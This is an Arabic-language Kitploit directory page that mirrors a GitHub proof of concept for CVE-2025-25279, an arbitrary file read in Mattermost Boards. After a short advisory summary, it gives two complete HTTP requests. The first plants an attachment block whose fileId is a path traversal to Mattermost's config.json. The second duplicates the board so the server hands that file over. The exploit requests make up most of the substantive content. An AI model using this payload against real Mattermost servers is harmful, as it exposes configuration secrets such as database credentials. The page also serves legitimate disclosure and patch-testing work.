Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-25279 | Kitploit
أدوات/GitHubGitHub/numanturle/cve-2025-25279
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبتسريب البياناتجمع المعلوماتسوء التكوين
GitHubnumanturle/cve-2025-25279

CVE-2025-25279

عرض المستودع
42منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

نشرة أمنية MMSA-2025-00430 / CVE-2025-25279

ملخص

بعد رفع ملف إلى Mattermost Boards، عندما يتم تعديل معامل fileId ونسخ اللوحة، يشير الملف الآن إلى الملف الهدف المحدد في المعامل ويقوم بتنزيله.

الإصدارات المتأثرة: حالات Mattermost مع تفعيل Boards CVE: CVE-2025-25279

الوصف

تفشل إصدارات Mattermost 10.4.x <= 10.4.1 و9.11.x <= 9.11.7 و10.3.x <= 10.3.2 و10.2.x <= 10.2.2 في التحقق بشكل صحيح من كتل اللوحة عند استيراد اللوحات، مما يسمح للمهاجم بقراءة أي ملف عشوائي على النظام عبر استيراد وتصدير أرشيف استيراد مصمم خصيصًا في Boards.

لقطات الشاشة

Screenshot 1 Screenshot 2 Screenshot 3 Screenshot 4

root@kitploit:~
POST /plugins/focalboard/api/v2/boards/bqgcxem5wo3ncfxkbfn5rkawxcr/blocks HTTP/1.1
Host: localhost:8065
Content-Length: 403
Authorization: 
Accept-Language: en-US,en;q=0.9
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0
Accept: application/json
Content-Type: application/json
Origin: http://localhost:8065
Connection: keep-alive

[{"id":"7gni7t3q3gj6unkq49mpb3xzdre","schema":1,"boardId":"bqgcxem5wo3ncfxkbfn5rkawxcr","parentId":"crc1qdykm1pg4mbfpct45qnyorw","createdBy":"","modifiedBy":"","type":"attachment","fields":{"fileId":"../../../../../../../mattermost/config/config.json"},"title":"CVE-2025-25279.txt","createAt":1740423098470,"updateAt":1740423098470,"deleteAt":0,"limited":false,"isUploading":false,"uploadingPercent":0}]
root@kitploit:~
POST /plugins/focalboard/api/v2/boards/bqgcxem5wo3ncfxkbfn5rkawxcr/blocks/crc1qdykm1pg4mbfpct45qnyorw/duplicate?asTemplate=false HTTP/1.1
Host: localhost:8065
Content-Length: 0
Authorization: 
Accept-Language: en-US,en;q=0.9
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 
Accept: application/json
Content-Type: application/json
Origin: http://localhost:8065
Connection: keep-alive


المراجع

  • تحديثات أمان Mattermost
  • CWE-200: كشف المعلومات
  • CVE-2025-25279

الفضل ليس لي، يتضمن مراجعة

تنزيل الأداة